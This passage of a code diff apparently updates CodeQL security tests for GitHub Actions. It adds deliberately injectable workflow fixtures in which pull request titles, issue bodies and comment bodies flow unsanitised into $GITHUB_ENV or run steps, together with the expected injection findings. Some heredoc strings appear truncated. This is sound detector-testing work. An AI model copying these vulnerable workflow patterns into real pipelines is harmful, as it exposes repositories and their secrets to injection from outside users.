"PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -444,7 +614,7 @@ nodeLocations | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | @@ -575,20 +745,59 @@ testNormalizeExpr | github.event.pull_request.user["login"] | github.event.pull_request.user.login | | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}) | PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV})\nEOF | +| VAR0 | $TITLE | VAR0<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | +| VAR4 | ${ISSUE_BODY1} | VAR4=${ISSUE_BODY1} | +| VAR5 | Hello\nWorld | VAR5<> $GITHUB_ENV", - "echo 'sha2=$(> $GITHUB_ENV", - "echo sha3=$(> $GITHUB_ENV", + "FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR" + //"FOO\n{\n echo 'JSON_RESPONSE<> \"$GITHUB_ENV\"\nBAR", + //"FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", ] and - extractLineAssignment(t, "ENV", key, value) + //linesFileWrite(t, _, "$GITHUB_ENV", content, _) + blockFileWrite(t, _, "$GITHUB_ENV", content, _) + //extractFileWrite(t, "GITHUB_ENV", content) ) } -query predicate writeToGitHubOutput(string key, string value) { +query predicate writeToGitHubEnv(string key, string value, string content) { exists(string t | t = [ - "echo \"::set-output name=id1::$(> $GITHUB_OUTPUT", - "echo 'sha2=$(> $GITHUB_OUTPUT", - "echo sha3=$(> $GITHUB_OUTPUT", - "echo sha4=$(> \"$GITHUB_OUTPUT\"", - "echo sha5=$(> ${GITHUB_OUTPUT}", - "echo sha6=$(> \"${GITHUB_OUTPUT}\"", + // block + "{\n echo 'VAR0<> \"$GITHUB_ENV\"\n", + "{\necho 'VAR1<> \"$GITHUB_ENV\"", + "{\necho 'VAR2<> \"$GITHUB_ENV\"", + "FOO\n{\n echo 'VAR22<> \"$GITHUB_ENV\"\nBAR", + // multiline + "FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", + "echo \"PACKAGES_FILE_LIST<> \"${GITHUB_ENV}\"\nls | grep -E \"*.(tar.gz|zip)$\" >> \"${GITHUB_ENV}\"\nls | grep -E \"*.(txt|md)$\" >> \"${GITHUB_ENV}\"\necho \"EOF\" >> \"${GITHUB_ENV}\"", + // heredoc 1 + "cat >> $GITHUB_ENV << EOL\nVAR4=${ISSUE_BODY1}\nEOL", + "cat > $GITHUB_ENV << EOL\nVAR5<> $GITHUB_ENV\nVAR6=${ISSUE_BODY3}\nEOL\n", + "cat < $GITHUB_ENV\nVAR7<> \"$GITHUB_ENV\"\nVAR8=$(echo \"FOO\")\nVAR9<> $GITHUB_ENV", + "echo 'VAR14=$(> $GITHUB_ENV", + "echo VAR15=$(> $GITHUB_ENV", + "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", ] and - extractLineAssignment(t, "OUTPUT", key, value) + extractFileWrite(t, "GITHUB_ENV", content) and + extractVariableAndValue(content, key, value) + ) +} + +query predicate writeToGitHubOutput(string key, string value, string content) { + exists(string t | + t = + [ + "echo \"::set-output name=VAR1::$(> $GITHUB_OUTPUT", + "echo 'VAR5=$(> $GITHUB_OUTPUT", + "echo VAR6=$(> $GITHUB_OUTPUT", + "echo VAR7=$(> \"$GITHUB_OUTPUT\"", + "echo VAR8=$(> ${GITHUB_OUTPUT}", + "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", + ] and + extractFileWrite(t, "GITHUB_OUTPUT", content) and + extractVariableAndValue(content, key, value) + ) +} + +query predicate isBashParameterExpansion(string parameter, string operator, string params) { + exists(string test | + test = + [ + "$parameter1", "${parameter2}", "${!parameter3}", "${#parameter4}", "${parameter5:-value}", + "${parameter6:=value}", "${parameter7:+value}", "${parameter8:?value}", + "${parameter9:=default value}", "${parameter10##*/}", "${parameter11/#pattern/string}", + "${parameter12/%pattern/string}", "${parameter13,pattern}", "${parameter14,,pattern}", + "${parameter15^pattern}", "${parameter16^^pattern}", "${parameter17:start}", + "${parameter18#pattern}", "${parameter19##pattern}", "${parameter20%pattern}", + "${parameter21%%pattern}", "${parameter22/pattern/string}", + "${parameter23//pattern/string}", + ] and + isBashParameterExpansion(test, parameter, operator, params) ) } diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml index 0ca7ecdfbde3..c2e9e17160d3 100644 --- a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml +++ b/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml @@ -27,7 +27,7 @@ jobs: CONFIG_PATH: ${{ inputs.config-path }} run: | echo ${{ inputs.config-path }} - echo "::set-output name=step-output:: $CONFIG_PATH" + echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 uses: tj-actions/changed-files@v40 diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 154a8135bad4..7b30ec8b7e42 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -36,14 +36,14 @@ jobs: run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" + echo "$TITLE" echo EOF } >> "$GITHUB_ENV" - env: TITLE: ${{ github.event.pull_request.title }} run: | cat <<-EOF >> "$GITHUB_ENV" - echo "FOO=$TITLE" + FOO=$TITLE EOF - env: TITLE: ${{ github.event.pull_request.head.ref }} @@ -55,6 +55,17 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.event.pull_request.title }} + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + - env: + TITLE: |- + ${{ github.event.pull_request.title }} + run: | + cat > issue.txt << EOL + ${TITLE} + EOL + echo REPO_NAME=$(cat issue.txt | sed 's/\r/\n/g' | grep -ioE '\s*[a-z0-9_-]+/[a-z0-9_-]+\s*$' | tr -d ' ') >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 369085708a06..ffaaf91e5504 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -6,9 +6,10 @@ edges | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -26,11 +27,13 @@ nodes | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths @@ -42,7 +45,8 @@ subpaths | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 241a33146b88..28fffe0e5e4d 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -6,9 +6,10 @@ edges | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -26,11 +27,13 @@ nodes | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml new file mode 100644 index 000000000000..b9b861bd060c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml @@ -0,0 +1,13 @@ +name: Test +on: + issue_comment: + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo '${{ toJSON(github.event.comment.body).foo }}' + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index ac4761deda1f..484121163634 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -234,6 +234,7 @@ nodes | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -330,6 +331,7 @@ subpaths | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | 